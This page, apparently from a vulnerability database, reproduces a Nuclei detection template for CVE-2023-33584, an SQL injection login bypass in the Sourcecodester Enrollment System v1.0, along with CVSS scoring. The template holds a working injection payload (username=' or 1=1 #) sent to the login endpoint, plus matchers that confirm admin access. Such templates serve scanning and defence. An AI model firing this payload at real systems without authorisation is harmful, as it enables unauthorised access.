Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-33584
HistoryOct 17, 2023 - 7:20 a.m.

Enrollment System Project v1.0 - SQL Injection Authentication Bypass

2023-10-1707:20:28
ProjectDiscovery
github.com
24
sql injection
authentication bypass
sourcecodester
user input validation

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.006 Low

EPSS

Percentile

77.7%

Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
id: CVE-2023-33584

info:
  name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
  author: r3Y3r53
  severity: critical
  description: |
    Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
  reference:
    - https://www.exploit-db.com/exploits/51501
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33584
    - https://packetstormsecurity.com/files/cve/CVE-2023-33584
    - https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
    - https://github.com/akarrel/test_enrollment
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33584
    cwe-id: CWE-89
    epss-score: 0.06893
    epss-percentile: 0.93907
    cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: enrollment_system_project
    product: enrollment_system
  tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project

http:
  - raw:
      - |
        POST /enrollment/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username='+or+1%3D1+%23&password={{randstr}}
      - |
        GET /enrollment/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206aaa84cea2c1bd95ad50ada9f31acf013411b7cc186218000d599f6a5fcb5f4c0220475a15acd3ca7129f3a4a37fa8f08f102f77fe30ab802737f61c6585f97452a8:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.006 Low

EPSS

Percentile

77.7%

Related for NUCLEI:CVE-2023-33584